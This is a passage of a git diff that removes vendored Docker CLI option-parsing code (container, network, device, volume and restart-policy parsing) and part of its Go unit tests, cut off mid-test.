nil values. - // See https://github.com/docker/docker/pull/17779 - // for a more detailed explanation on why we don't want that. 
- DNS: copts.dns.GetAllOrEmpty(), - DNSSearch: copts.dnsSearch.GetAllOrEmpty(), - DNSOptions: copts.dnsOptions.GetAllOrEmpty(), - ExtraHosts: copts.extraHosts.GetAll(), - VolumesFrom: copts.volumesFrom.GetAll(), - NetworkMode: container.NetworkMode(copts.netMode), - IpcMode: ipcMode, - PidMode: pidMode, - UTSMode: utsMode, - UsernsMode: usernsMode, - CapAdd: strslice.StrSlice(copts.capAdd.GetAll()), - CapDrop: strslice.StrSlice(copts.capDrop.GetAll()), - GroupAdd: copts.groupAdd.GetAll(), - RestartPolicy: restartPolicy, - SecurityOpt: securityOpts, - StorageOpt: storageOpts, - ReadonlyRootfs: copts.readonlyRootfs, - LogConfig: container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts}, - VolumeDriver: copts.volumeDriver, - Isolation: container.Isolation(copts.isolation), - ShmSize: shmSize, - Resources: resources, - Tmpfs: tmpfs, - Sysctls: copts.sysctls.GetAll(), - Runtime: copts.runtime, - } - - // only set this value if the user provided the flag, else it should default to nil - if flags.Changed("init") { - hostConfig.Init = &copts.init - } - - // When allocating stdin in attached mode, close stdin at client disconnect - if config.OpenStdin && config.AttachStdin { - config.StdinOnce = true - } - - networkingConfig := &networktypes.NetworkingConfig{ - EndpointsConfig: make(map[string]*networktypes.EndpointSettings), - } - - if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 { - epConfig := &networktypes.EndpointSettings{} - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - - epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{ - IPv4Address: copts.ipv4Address, - IPv6Address: copts.ipv6Address, - } - - if copts.linkLocalIPs.Len() > 0 { - epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len()) - copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll()) - } - } - - if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 { - epConfig := 
networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] - if epConfig == nil { - epConfig = &networktypes.EndpointSettings{} - } - epConfig.Links = make([]string, len(hostConfig.Links)) - copy(epConfig.Links, hostConfig.Links) - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - } - - if copts.aliases.Len() > 0 { - epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] - if epConfig == nil { - epConfig = &networktypes.EndpointSettings{} - } - epConfig.Aliases = make([]string, copts.aliases.Len()) - copy(epConfig.Aliases, copts.aliases.GetAll()) - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - } - - return config, hostConfig, networkingConfig, nil -} - -// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys -// present in the file with additional pairs specified in the override parameter -func ReadKVStrings(files []string, override []string) ([]string, error) { - envVariables := []string{} - for _, ef := range files { - parsedVars, err := ParseEnvFile(ef) - if err != nil { - return nil, err - } - envVariables = append(envVariables, parsedVars...) - } - // parse the '-e' and '--env' after, to allow override - envVariables = append(envVariables, override...) - - return envVariables, nil -} - // ConvertKVStringsToMap converts ["key=value"] to {"key":"value"} func ConvertKVStringsToMap(values []string) map[string]string { result := make(map[string]string, len(values)) @@ -704,292 +18,3 @@ func ConvertKVStringsToMap(values []string) map[string]string { return result } - -// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"} -// but set unset keys to nil - meaning the ones with no "=" in them. 
-// We use this in cases where we need to distinguish between -// FOO= and FOO -// where the latter case just means FOO was mentioned but not given a value -func ConvertKVStringsToMapWithNil(values []string) map[string]*string { - result := make(map[string]*string, len(values)) - for _, value := range values { - kv := strings.SplitN(value, "=", 2) - if len(kv) == 1 { - result[kv[0]] = nil - } else { - result[kv[0]] = &kv[1] - } - } - - return result -} - -func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) { - loggingOptsMap := ConvertKVStringsToMap(loggingOpts) - if loggingDriver == "none" && len(loggingOpts) > 0 { - return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver) - } - return loggingOptsMap, nil -} - -// takes a local seccomp daemon, reads the file contents for sending to the daemon -func parseSecurityOpts(securityOpts []string) ([]string, error) { - for key, opt := range securityOpts { - con := strings.SplitN(opt, "=", 2) - if len(con) == 1 && con[0] != "no-new-privileges" { - if strings.Contains(opt, ":") { - con = strings.SplitN(opt, ":", 2) - } else { - return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt) - } - } - if con[0] == "seccomp" && con[1] != "unconfined" { - f, err := ioutil.ReadFile(con[1]) - if err != nil { - return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err) - } - b := bytes.NewBuffer(nil) - if err := json.Compact(b, f); err != nil { - return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err) - } - securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes()) - } - } - - return securityOpts, nil -} - -// parses storage options per container into a map -func parseStorageOpts(storageOpts []string) (map[string]string, error) { - m := make(map[string]string) - for _, option := range storageOpts { - if strings.Contains(option, "=") { - opt := strings.SplitN(option, "=", 2) - 
m[opt[0]] = opt[1] - } else { - return nil, fmt.Errorf("invalid storage option") - } - } - return m, nil -} - -// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect -func ParseRestartPolicy(policy string) (container.RestartPolicy, error) { - p := container.RestartPolicy{} - - if policy == "" { - return p, nil - } - - parts := strings.Split(policy, ":") - - if len(parts) > 2 { - return p, fmt.Errorf("invalid restart policy format") - } - if len(parts) == 2 { - count, err := strconv.Atoi(parts[1]) - if err != nil { - return p, fmt.Errorf("maximum retry count must be an integer") - } - - p.MaximumRetryCount = count - } - - p.Name = parts[0] - - return p, nil -} - -// ParseDevice parses a device mapping string to a container.DeviceMapping struct -func ParseDevice(device string) (container.DeviceMapping, error) { - src := "" - dst := "" - permissions := "rwm" - arr := strings.Split(device, ":") - switch len(arr) { - case 3: - permissions = arr[2] - fallthrough - case 2: - if ValidDeviceMode(arr[1]) { - permissions = arr[1] - } else { - dst = arr[1] - } - fallthrough - case 1: - src = arr[0] - default: - return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device) - } - - if dst == "" { - dst = src - } - - deviceMapping := container.DeviceMapping{ - PathOnHost: src, - PathInContainer: dst, - CgroupPermissions: permissions, - } - return deviceMapping, nil -} - -// ParseLink parses and validates the specified string as a link format (name:alias) -func ParseLink(val string) (string, string, error) { - if val == "" { - return "", "", fmt.Errorf("empty string specified for links") - } - arr := strings.Split(val, ":") - if len(arr) > 2 { - return "", "", fmt.Errorf("bad format for links: %s", val) - } - if len(arr) == 1 { - return val, val, nil - } - // This is kept because we can actually get a HostConfig with links - // from an already created container and the format is not `foo:bar` - // but `/foo:/c1/bar` - if 
strings.HasPrefix(arr[0], "/") { - _, alias := path.Split(arr[1]) - return arr[0][1:], alias, nil - } - return arr[0], arr[1], nil -} - -// ValidateLink validates that the specified string has a valid link format (containerName:alias). -func ValidateLink(val string) (string, error) { - if _, _, err := ParseLink(val); err != nil { - return val, err - } - return val, nil -} - -// ValidDeviceMode checks if the mode for device is valid or not. -// Valid mode is a composition of r (read), w (write), and m (mknod). -func ValidDeviceMode(mode string) bool { - var legalDeviceMode = map[rune]bool{ - 'r': true, - 'w': true, - 'm': true, - } - if mode == "" { - return false - } - for _, c := range mode { - if !legalDeviceMode[c] { - return false - } - legalDeviceMode[c] = false - } - return true -} - -// ValidateDevice validates a path for devices -// It will make sure 'val' is in the form: -// [host-dir:]container-path[:mode] -// It also validates the device mode. -func ValidateDevice(val string) (string, error) { - return validatePath(val, ValidDeviceMode) -} - -func validatePath(val string, validator func(string) bool) (string, error) { - var containerPath string - var mode string - - if strings.Count(val, ":") > 2 { - return val, fmt.Errorf("bad format for path: %s", val) - } - - split := strings.SplitN(val, ":", 3) - if split[0] == "" { - return val, fmt.Errorf("bad format for path: %s", val) - } - switch len(split) { - case 1: - containerPath = split[0] - val = path.Clean(containerPath) - case 2: - if isValid := validator(split[1]); isValid { - containerPath = split[0] - mode = split[1] - val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode) - } else { - containerPath = split[1] - val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath)) - } - case 3: - containerPath = split[1] - mode = split[2] - if isValid := validator(split[2]); !isValid { - return val, fmt.Errorf("bad mode specified: %s", mode) - } - val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, 
mode) - } - - if !path.IsAbs(containerPath) { - return val, fmt.Errorf("%s is not an absolute path", containerPath) - } - return val, nil -} - -// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon. -// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped). -// In Windows driver letter appears in two situations: -// a. `^[a-zA-Z]:` (A colon followed by `^[a-zA-Z]:` is OK as colon is the separator in volume option) -// b. A string in the format like `\\?\C:\Windows\...` (UNC). -// Therefore, a driver letter can only follow either a `:` or `\\` -// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`. -func volumeSplitN(raw string, n int) []string { - var array []string - if len(raw) == 0 || raw[0] == ':' { - // invalid - return nil - } - // numberOfParts counts the number of parts separated by a separator colon - numberOfParts := 0 - // left represents the left-most cursor in raw, updated at every `:` character considered as a separator. - left := 0 - // right represents the right-most cursor in raw incremented with the loop. Note this - // starts at index 1 as index 0 is already handle above as a special case. - for right := 1; right < len(raw); right++ { - // stop parsing if reached maximum number of parts - if n >= 0 && numberOfParts >= n { - break - } - if raw[right] != ':' { - continue - } - potentialDriveLetter := raw[right-1] - if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') { - if right > 1 { - beforePotentialDriveLetter := raw[right-2] - // Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`) - if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' { - // e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`. 
- array = append(array, raw[left:right]) - left = right + 1 - numberOfParts++ - } - // else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing. - } - // if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing. - } else { - // if `:` is not preceded by a potential drive letter, then consider it as a delimiter. - array = append(array, raw[left:right]) - left = right + 1 - numberOfParts++ - } - } - // need to take care of the last part - if left < len(raw) { - if n >= 0 && numberOfParts >= n { - // if the maximum number of parts is reached, just append the rest to the last part - // left-1 is at the last `:` that needs to be included since not considered a separator. - array[n-1] += raw[left-1:] - } else { - array = append(array, raw[left:]) - } - } - return array -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go deleted file mode 100644 index a1be379ae8..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go +++ /dev/null @@ -1,894 +0,0 @@ -package opts - -import ( - "bytes" - "encoding/json" - "fmt" - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/runconfig" - "github.com/docker/go-connections/nat" - "github.com/spf13/pflag" -) - -func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - flags := pflag.NewFlagSet("run", pflag.ContinueOnError) - flags.SetOutput(ioutil.Discard) - flags.Usage = nil - copts := AddFlags(flags) - if err := flags.Parse(args); err != nil { - return nil, nil, nil, err - } - return Parse(flags, copts) -} - -func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) { - config, 
hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " ")) - return config, hostConfig, err -} - -func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) { - config, hostConfig, err := parse(t, args) - if err != nil { - t.Fatal(err) - } - return config, hostConfig -} - -func TestParseRunLinks(t *testing.T) { - if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" { - t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links) - } - if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" { - t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links) - } - if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 { - t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links) - } -} - -func TestParseRunAttach(t *testing.T) { - if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect all attach enabled. 
Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - - if _, _, err := parse(t, "-a"); err == nil { - t.Fatalf("Error parsing attach flags, `-a` should be an error but is not") - } - if _, _, err := parse(t, "-a invalid"); err == nil { - t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not") - } - if _, _, err := parse(t, "-a invalid -a stdout"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not") - } - if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stdin -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stdout -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stderr -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not") - } - if _, _, err := parse(t, "-d --rm"); err == nil { - t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not") - } -} - -func TestParseRunVolumes(t *testing.T) { - - // A single volume - arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`}) - if config, 
hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) - } else if _, exists := config.Volumes[arr[0]]; !exists { - t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes) - } - - // Two volumes - arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) - } else if _, exists := config.Volumes[arr[0]]; !exists { - t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes) - } else if _, exists := config.Volumes[arr[1]]; !exists { - t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes) - } - - // A single bind-mount - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] { - t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes) - } - - // Two bind-mounts. - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - // Two bind-mounts, first read-only, second read-write. 
- // TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4 - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - // Similar to previous test but with alternate modes which are only supported by Linux - if runtime.GOOS != "windows" { - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - } - - // One bind mount and one volume - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] { - t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. 
Received %s", arr[0], arr[1], arr[0], hostConfig.Binds) - } else if _, exists := config.Volumes[arr[1]]; !exists { - t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes) - } - - // Root to non-c: drive letter (Windows specific) - if runtime.GOOS == "windows" { - arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 { - t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0]) - } - } - -} - -// This tests the cases for binds which are generated through -// DecodeContainerConfig rather than Parse() -func TestDecodeContainerConfigVolumes(t *testing.T) { - - // Root to root - bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // No destination path - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // // No destination path or mode - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - 
t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A whole lot of nothing - bindsOrVols = []string{`:`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A whole lot of nothing with no mode - bindsOrVols = []string{`::`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Too much including an invalid mode - wTmp := os.Getenv("TEMP") - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Windows specific error tests - if runtime.GOOS == "windows" { - // Volume which does not include a drive letter - bindsOrVols = []string{`\tmp`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Root to C-Drive - bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Container 
path that does not include a drive letter - bindsOrVols = []string{`c:\windows:\somewhere`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - } - - // Linux-specific error tests - if runtime.GOOS != "windows" { - // Just root - bindsOrVols = []string{`/`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A single volume that looks like a bind mount passed in Volumes. - // This should be handled as a bind mount, not a volume. - vols := []string{`/foo:/bar`} - if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil { - t.Fatal("Volume /foo:/bar should have succeeded as a volume name") - } else if hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds) - } else if _, exists := config.Volumes[vols[0]]; !exists { - t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes) - } - - } -} - -// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes -// to call DecodeContainerConfig. It effectively does what a client would -// do when calling the daemon by constructing a JSON stream of a -// ContainerConfigWrapper which is populated by the set of volume specs -// passed into it. It returns a config and a hostconfig which can be -// validated to ensure DecodeContainerConfig has manipulated the structures -// correctly. 
-func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) { - var ( - b []byte - err error - c *container.Config - h *container.HostConfig - ) - w := runconfig.ContainerConfigWrapper{ - Config: &container.Config{ - Volumes: map[string]struct{}{}, - }, - HostConfig: &container.HostConfig{ - NetworkMode: "none", - Binds: binds, - }, - } - for _, v := range volumes { - w.Config.Volumes[v] = struct{}{} - } - if b, err = json.Marshal(w); err != nil { - return nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) - } - c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b)) - if err != nil { - return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err) - } - if c == nil || h == nil { - return nil, nil, fmt.Errorf("Empty config or hostconfig") - } - - return c, h, err -} - -// check if (a == c && b == d) || (a == d && b == c) -// because maps are randomized -func compareRandomizedStrings(a, b, c, d string) error { - if a == c && b == d { - return nil - } - if a == d && b == c { - return nil - } - return fmt.Errorf("strings don't match") -} - -// setupPlatformVolume takes two arrays of volume specs - a Unix style -// spec and a Windows style spec. Depending on the platform being unit tested, -// it returns one of them, along with a volume string that would be passed -// on the docker CLI (eg -v /bar -v /foo). 
-func setupPlatformVolume(u []string, w []string) ([]string, string) { - var a []string - if runtime.GOOS == "windows" { - a = w - } else { - a = u - } - s := "" - for _, v := range a { - s = s + "-v " + v + " " - } - return a, s -} - -// Simple parse with MacAddress validation -func TestParseWithMacAddress(t *testing.T) { - invalidMacAddress := "--mac-address=invalidMacAddress" - validMacAddress := "--mac-address=92:d0:c6:0a:29:33" - if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" { - t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err) - } - if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" { - t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress) - } -} - -func TestParseWithMemory(t *testing.T) { - invalidMemory := "--memory=invalid" - validMemory := "--memory=1G" - if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" { - t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err) - } - if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 { - t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory) - } -} - -func TestParseWithMemorySwap(t *testing.T) { - invalidMemory := "--memory-swap=invalid" - validMemory := "--memory-swap=1G" - anotherValidMemory := "--memory-swap=-1" - if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" { - t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err) - } - if _, hostconfig := mustParse(t, validMemory); hostconfig.MemorySwap != 1073741824 { - t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap) - } - if _, hostconfig := mustParse(t, 
anotherValidMemory); hostconfig.MemorySwap != -1 { - t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap) - } -} - -func TestParseHostname(t *testing.T) { - validHostnames := map[string]string{ - "hostname": "hostname", - "host-name": "host-name", - "hostname123": "hostname123", - "123hostname": "123hostname", - "hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error", - } - hostnameWithDomain := "--hostname=hostname.domainname" - hostnameWithDomainTld := "--hostname=hostname.domainname.tld" - for hostname, expectedHostname := range validHostnames { - if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname { - t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname) - } - } - if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" { - t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname) - } - if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" { - t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname) - } -} - -func TestParseWithExpose(t *testing.T) { - invalids := map[string]string{ - ":": "invalid port format for --expose: :", - "8080:9090": "invalid port format for --expose: 8080:9090", - "/tcp": "invalid range format for --expose: /tcp, error: Empty string specified for ports.", - "/udp": "invalid range format for --expose: /udp, error: Empty string specified for ports.", - "NaN/tcp": `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "NaN-NaN/tcp": `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "8080-NaN/tcp": `invalid 
